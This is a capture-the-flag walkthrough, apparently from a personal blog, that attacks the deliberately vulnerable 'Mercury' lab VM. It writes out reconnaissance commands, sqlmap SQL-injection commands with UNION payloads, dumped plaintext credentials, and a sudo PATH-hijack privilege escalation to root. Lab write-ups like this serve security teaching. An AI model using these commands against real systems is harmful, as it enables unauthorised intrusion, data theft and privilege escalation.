VirtualBox Mercury Fully Imported

Next, with the virtual machine selected, you’ll want to click the orange Settings Gear (1), then select the Network menu (2), choose Host-only Adapter from the Attached to: drop down (3), and click OK (4). This will close the dialog box. Then click the green Start button (5) to start the VM. It is possible that you may not have a Host-only Adapter properly configured. If not – and because these details have changed in the past – just work through this Google Search. We’re doing this as a good way to allow VM to VM communication and that’s all.
Setting the VirtualBox Host Only Adapter

Once you’ve hit the play button, the machine will start up and you’ll see some Linux OS information go by and then the box will finally get to a login prompt. This means you’re ready to go. You can now minimize that window and get ready to work.
Mercury VM Login Prompt

For my environment, I have another VirtualBox VM of Kali that I changed the network adapter to Host Only from its normal NAT setting to do this exercise. I booted that up and logged in. The first thing we need to do is make sure we have netdiscover on our box. Kali is Debian based, so it uses apt to install things by default. I opened a terminal and I issued the command sudo apt install netdiscover. I had already entered my sudo password before this, so I wasn’t prompted, but you might be. I also already had this on my box, so your command window may look differently during and after the install.
apt install netdiscover

Then, I ran an ifconfig to see what my available network interfaces were. You can see that I have two network interfaces. One is called eth0 and the other is lo. lo is my local loopback interface, so eth0 is the one I want. Yours may be called something different for many reasons, including how you configured your adapters within VirtualBox.
ifconfig results

Next, I ran the command sudo netdiscover -i eth0. That brought up an auto-updating table that scanned every possible network address connected through that interface (-i eth0). Our goal here is to find out what IP Address the Mercury VM is at. If you aren’t sure, you can scan each one, but in this case, I know it is the one located at 192.168.56.101.
Netdiscover Results

That means that it is now time to scan the box. This is our first “this is a CTF, not real life” warning. All of the scans I’m doing here are “noisy”. What that means is that I’m not sneaking around. I’m running these so they take less time from my perspective and are as instrusive as possible. If I was really doing a penetration test on someone, their monitoring tools would light up. It would be like a criminal pulling up to your house in a loud truck blaring music and wearing jingle bells as they used a battering ram on your front door.

Warning aside, I ran nmap -sC -sV -p- -T4 –min-rate=9326 -vv -oN mercury_nmap.log 192.168.56.101. That command breaks down that I’m using default scripts (-sC) and I’m going to try to detect versions (-sV), I’m scanning all 65535 ports (-p-), I’m going super fast (-T4, where 5 is the highest/fastest), I’m going at 9326 packets per second at least (–min-rate=9326), I want the outputs very verbose (-vv), I want the output to a file called mercury_nmap.log (-oN mercury_nmap.log) and lastly that we’re going to scan 192.168.56.101. Why 9326 packets per second? No real reason that I’m aware of except that someone I was learning from used it once, so I do.

That scan returned a lot of results, but the main things we learned from it are:

Nmap scan report for 192.168.56.101
Host is up, received conn-refused (0.00054s latency).
Scanned at 2024-03-22 16:11:14 EDT for 96s
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack WSGIServer/0.2 CPython/3.8.2

So this machine exposes a web server and has secure shell (SSH) open. My next step is also now built on CTF mentality. I’m assuming that SSH is mid-game in our chess match. I figure I’m supposed to learn something from the web server first that will make the SSH part a little easier. So, I navigated to http://192.168.56.101:8080 and got this.
Mercury's Default Webpage

Sometimes, in CTFs, the developers will leave clues in the Source. In this case, that text is all there is. It isn’t even HTML. So my next step was to use a tool to enumerate the website to try to find directories that aren’t linked to by just “guessing” from curated wordlists and seeing what hits. In this case, I used the command gobuster dir -w /usr/share/wordlists/dirb/common.txt -o mercury_gobuster.log -u http://192.168.56.101:8080. This just used the gobuster program in directory mode (dir) with the wordlist (-w) of common possibilities, outputting (-o) to a log file against the url (-u) of our website. One of the benefits to using a box made for Offensive Security is that they often come with wordlists like this, though you can find them online, download them, and use them wherever you’re working from.
My gobuster results

Well, the only thing we found is a robots.txt. Because we didn’t find anything else, I did try some larger and larger lists, but they also returned only the robots.txt. I guess that means we should check it out.
Robots.txt Contents

Wow. That’s almost amazing in its uselessness. Now, we are at another point when I took a shot. I know a few things. 1) This box is marked as “Easy” and 2) This is a CTF. Some CTFs (especially harder ones) might have an open port with a trail for you to follow and even more work than this all for it to lead to nothing but a waste of time. But, because this is Easy, I wanted to try to see if causing an error would give us information. Maybe the error page would give us Server OS info and we could try an exploit, or reveal something else entirely. So, I navigated to http://192.168.56.101:8080/showmea404 in an attempt to see the 404 page.
The Mercury 404 Page

Jackpot. This server is using Django (useful), but even more useful is that it tried to resolve my URL by checking the index (we know about that), the robots.txt (ditto), and in a directory called mercuryfacts. Hmmmmm, that sounds promising. Let’s navigate to http://192.168.56.101:8080/mercuryfacts
The Mercury Facts Home Page

Here we go! We can load a fact and we can see their Todo List. (The Todo List is the sort of thing that is often left in HTML comments in these). So, I checked the Todo link first and found this
Mercury Facts Todo

Okay, information! We know there is either a users table that exists or they are using some (probably poor) other means of authentication in the interim. Also, they are making direct mysql calls (I’m smelling some possible SQL Injection!). What about that other link? I clicked it and it took me to fact 1. I went back and clicked it again and again and the fact isn’t random, this is all get and there is no navigation. So, I started just changing the number. First I went to 2 and got another fact, then to 999 and got no fact. Lastly, I tried a fact id of “pete” and that got me an error page (see how we love error pages that leak information!?)
Mercury Facts Enumeration

What we see in that error is that they are just taking the value from the url and just sticking it into a SQL query. Because we had a word and not a number, mysql thought I was trying to address a column in the where clause. I don’t need to go any further, I’m going to jump right into sqlmap to try to exploit this. sqlmap is a tool that attempts sql injection several different ways. When it works, you can dump databases, get table data, and all kinds of good stuff.

The first thing I tested was whether or not this would actually work. So, I issued the command sqlmap -u “http://192.168.56.101:8080/mercuryfacts/1” –dbms=mysql –risk=3 –level=5 –technique=U. In this case, the -u is our URL, the –dbms is telling it which database product to try to hit. We know mysql from the todos, but sqlmap can also guess if you don’t provide that. The risk and level values are just about the noise we’re willing to make and how hard we want the tool to try. Lastly, the –technique=U is telling it to do SQL UNIONS in an attempt to exfiltrate the data.
sqlmap initial results

We see that this comes back and the parameter is injectable. This means we can try something else. In this case, I issued the command sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 –dbms=mysql –risk=3 –level=5 –technique=U –tables. That’s very similar except that I added –tables so it would dump the tables. We got this

sqlmap identified the following injection point(s) with a total of 119 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: information_schema
[78 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
              -- SNIP -- 
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

Database: mercury
[2 tables]
+---------------------------------------+
| facts                                 |
| users                                 |
+---------------------------------------+

Okay, the first information_schema db is just something that is a feature of the dbms. I –SNIP–‘ed a lot of that out of there so you could see it, but let’s not have it clog us up. We care about the mercury db and its two tables: facts and users. If we remember, the Todo list wanted to start using the users table, so we’re very interested. Let’s dump it. sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 –dbms=mysql -D mercury -T users –dump –batch –technique=U –level=5 –risk=3. Our only change this time is to remove the request to list the tables and instead specify the database name (-D mercury) and the table name (-T users) and tell it to –dump it in a –batch.

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7162707a71,0x71554a4b637448434261574e63514344716a56734371626a667a586a62507555586a635a4b717549,0x7176786a71)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password                      | username  |
+----+-------------------------------+-----------+
| 1  | johnny1987                    | john      |
| 2  | lovemykids111                 | laura     |
| 3  | lovemybeer111                 | sam       |
| 4  | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

Here we go! We have some usernames and plain text passwords. Now we can try to see what that SSH has got going on! Incidentally, if you examine the results of these scans, it took the tool 119 requests to dump the databases and tables and 49 requests to just get these 4 rows of one table. See what I mean about noisy?

Let’s use the webmaster account to get into the box. It seems like the ranking account. In addition, it has the best password, so I’m guessing it has the juicy stuff. So now we issue the command ssh webmaster@192.168.56.101 and then hit enter. Enter the password and accept the fingerprint as you’re asked and we’re in. The first thing I did was an ls to list the contents of the directory and there is a user_flag.txt right there. I issued a cat user_flag.txt command and we have our user flag!
SSH into Mercury

The thing about CTF boxes is that there is often a User flag and then a Root (or Admin) flag. We’re only half done. Might as well keep exploring. What’s in this mercury_proj directory? To find out, I typed cd mercury_proj/ && ls and saw a notes.txt file. I called cat notes.txt and got 2 users and 2 passwords of some sort. So, we know the webmaster password, so if we can work out the encoding or hashing, we might have a shot. At a minimum, this looks like Base64 encoding (the == padding at the end of the linuxmaster user’s password is often a giveaway as = is used as padding in base64). But just because it is base64 doesn’t mean that’s the answer, encryption will often use base64 as the final step so all of the characters are printable. But, I use the echo command to echo each value and then pipe (|) it into the base64 utility, asking it to –decode. We see that the webmaster password is the one we know, so we can trust that this linuxmaster password is probably their password value.
Base64 Encoded Passwords

We can check that immediately by calling su linuxmaster and providing that password. It is accepted and a whoami tells me that I’m now linuxmaster. Is this over now? Is it this easy? We wish! I dug around but didn’t find any other flags, so I’ll spare you those searches.
Changing to Linuxmaster user

That means that our next step is likely privilege escalation. There are a few ways to go, but one of the easiest is to look and see what applications that the user might be able to call sudo on and act as root. Issuing the command sudo -l will tell you just that.
Finding Linuxmaster sudo Permissions

Okay, so we can run a specific bash script as sudo. Oh, that’s good news. Sometimes, we can edit what’s in the file and just do whatever we want. Other times, we can take advantage of what’s in the file and take advantage of the command another way. Let’s see what we’ve got. In the image above, you can see that I followed that up with cat /usr/bin/check_syslog.sh to see what’s in the file. It just calls the Linux tail program to get the last 10 lines out of the /var/log/syslog file. This is actually a common kind of misconfiguration. The /var/log/syslog file needs elevated permissions or at least very specific permissions in order to read it. Instead of creating a group and giving that group permission to the file or using access control lists (ACLs), the admin figured he could give this user (and perhaps others) sudo permission on this script that only did one simple thing. But, they weren’t expecting this.

Linux (as well as many operating systems) store files in directory structures. The correct way to call every single program is to give its full path every time. We don’t do that. We just want to type ls or cat, not /bin/ls and /bin/cat or /usr/bin/ls and /usr/bin/cat. That’s where the path variable comes in. It defines a bunch of places/directories (in order) that the operating system is going to look for the thing you asked for. We can see what that should have been above. When using sudo, it is supposed to ignore your normal PATH and use the secure_path, which in this case for this user was declared as /usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin, /sbin, /bin, and /snap/bin.

We’re going to take advantage of this because you also see that we have the env_reset permission when using sudo. That lets us CHANGE where all it is willing to look for commands. So, what we’re going to do is create a symlink (think shortcut, of sorts) in our current directory called tail that actually points to /bin/vi. That means whenever the current directory is in the path and someone calls tail, vi will run instead. Some of you who are familiar with vi or vim will know that it can basically run like its own little operating system. So, if I can run get this bash script to run as sudo and then open vi, I can then do things within vi as root. Here are the steps:
We actually take advantage of the flaw

In this case, the first thing I do is make sure I’m in my home directory, somewhere I have full permissions, just in case (cd ~). Then I create a symlink (ln -s) pointing to /bin/vi whenever someone calls the command tail (which is called from within that script). So, I update my own PATH variable to be my current directory plus the existing path variable. export PATH means I’m making that environment variable, the equals sign means I’m assigning whatever is on the right hand side to the variable. The . is my current directory (where I put the symlink), the : is concatenating these values, and $PATH is the current PATH environment variable. So in one sentence, I updated my local PATH environment variable to include what it already had, but putting my current directory in first position so it is checked for a command match there first.

The next line is me doing a typo, you can ignore it. I left it in to show that I’m human, too 😉 But the right version of the command says sudo –preserve-env=PATH /usr/bin/check_syslog.sh. I’m calling for the elevated permissions, but then I’m using –preserve-env (because we have the env_reset permission) to use my new PATH environment variable (which includes my local directory) instead of the one carefully defined for me in secure_path. When I hit enter, vi automatically opens.
Our VI Window

If I type :, I’m automatically popped into command mode and typing shell and hitting enter opens a shell in my current context, which thanks to the sudo call on the check_syslog.sh file, is root. You can see here that I type whoami and I’m told that I’m root. I issued a cd ~ && ls command to change into root’s home directory and list out its contents. I see that there is a root_flag.txt file and a quick cat root_flag.txt and we can see that file’s contents.
We are root and showing the root flag

That’s it. In doing this box, we used the following skills:

  • nmap scan
  • gobuster scan (directory enumeration)
  • Found Error Page misconfiguration
  • Detected and exploited SQLi (SQL Injection)
  • Luck (found additional credentials)
  • symlinks
  • Misconfigured permissions, specifically around sudo and the secure_path variable

Not bad for a day’s work! Next time, I’ll take off a Red Team hat and put on a Blue Team hat and explain how the Administrators could have better protected this file and the sudo permissions (if they used them anyway).